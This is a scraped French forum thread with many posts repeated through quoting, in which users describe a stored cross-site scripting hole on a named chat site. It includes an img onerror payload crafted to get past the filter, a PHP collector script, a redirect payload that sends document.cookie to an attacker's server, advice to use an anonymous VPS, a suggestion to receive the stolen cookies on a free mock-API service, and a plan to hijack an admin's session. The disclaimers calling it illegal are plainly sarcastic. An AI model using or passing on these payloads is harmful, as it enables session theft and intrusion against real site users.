Ahi...
J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)
Quel site de merde, je me suis fais ban par l'admin!
C'est Chanel le modo.
En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="
https://url-d-image-qui-bug.png" onerror="alert('Quelle indignité!')" alt="
L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
Cum My Fanatics
J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)
Quel site de merde, je me suis fais ban par l'admin!
C'est Chanel le modo.
En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="
L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
il y a 2 ans
Sponsorisé
Connectez-vous pour masquer les pubsEvoIa
2 ans
Ahi...
J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)
Quel site de merde, je me suis fais ban par l'admin!
C'est Chanel le modo.
En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="
https://url-d-image-qui-bug.png" onerror="alert('Quelle indignité!')" alt="
L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)
Quel site de merde, je me suis fais ban par l'admin!
C'est Chanel le modo.
En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="
L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
Faut pas faire ce que j'écris ci dessous (sans précautions) parce que c'est illégal :
Fais une redirection pour voler les cookies des utilisateurs.
Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)
Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :
getcookie.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>
En suite pour le payload, tu vas juste remplacer l'alert par ceci :
Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.
Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...
Les possibilités d'exploitations sont larges.
Fais une redirection pour voler les cookies des utilisateurs.
Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)
Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :
getcookie.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>
En suite pour le payload, tu vas juste remplacer l'alert par ceci :
window.location.href="ton-ip-de-serveur/getcookie.php?cookie="+document.cookie;
Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.
Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...
Les possibilités d'exploitations sont larges.
il y a 2 ans
Faut pas faire ce que j'écris ci dessous (sans précautions) parce que c'est illégal :
Fais une redirection pour voler les cookies des utilisateurs.
Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)
Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :
getcookie.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>
En suite pour le payload, tu vas juste remplacer l'alert par ceci :
Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.
Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...
Les possibilités d'exploitations sont larges.
Fais une redirection pour voler les cookies des utilisateurs.
Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)
Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :
getcookie.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>
En suite pour le payload, tu vas juste remplacer l'alert par ceci :
window.location.href="ton-ip-de-serveur/getcookie.php?cookie="+document.cookie;
Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.
Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...
Les possibilités d'exploitations sont larges.
Pas besoin de t'emmerder, tu peux faire un mock d'API directement en ligne, par exemple ici:
https://app.beeceptor.com/console/test123456789
Plus qu'à faire une requête sur
https://test123456789.free.beeceptor.com et tu reçois les headers en temps réel.
De là, il ne faudrait surtout pas avoir l'idée de sérialiser les cookies et de les envoyer en paramètre GET sur ce serveur, car ce serait i-llé-gal!
Cum My Fanatics
Plus qu'à faire une requête sur
De là, il ne faudrait surtout pas avoir l'idée de sérialiser les cookies et de les envoyer en paramètre GET sur ce serveur, car ce serait i-llé-gal!
il y a 2 ans
EvoIa
2 ans
>vpn not allowed
un autre pot de miel ?
un autre pot de miel ?
La meilleure façon de châtier les hommes est de toujours donner ce qu'ils réclament.
il y a 2 ans
Sponsorisé
Connectez-vous pour masquer les pubs>vpn not allowed
un autre pot de miel ?
un autre pot de miel ?
Ayaa les enculés
J'y suis resté 5min avant de me faire ban, j'ai pas testé avec tor
Cum My Fanatics
J'y suis resté 5min avant de me faire ban, j'ai pas testé avec tor
il y a 2 ans
C'est qui le khey d'Audun-le-Tiche qui a cliqué sur le lien du mock ?
Cum My Fanatics
il y a 2 ans
purplewede
2 ans
Bounty ?
Oui, cette horreur codé avec une IA à tous les coups
Cum My Fanatics
il y a 2 ans
united-kv
2 ans
Y’a personne sur leurs site
Salon "photo / video / amateur" mais juste pour la blague, n'espère pas avoir des échanges avec de vraies humaines
Cum My Fanatics
il y a 2 ans
Oui, cette horreur codé avec une IA à tous les coups
il y a 2 ans
Bloquer la page chez tout le monde, les rediriger, voler leurs cookies, injecter un script (et là, tu peux tout faire, savoir ce qu'ils se disent en privé etc).
En bref, tout ce que tu peux coder
Cum My Fanatics
En bref, tout ce que tu peux coder
il y a 2 ans
Bloquer la page chez tout le monde, les rediriger, voler leurs cookies, injecter un script (et là, tu peux tout faire, savoir ce qu'ils se disent en privé etc).
En bref, tout ce que tu peux coder
En bref, tout ce que tu peux coder
Faut un peu toucher sa bille en informatique
il y a 2 ans
En ligne
231
Sur ce sujet0


















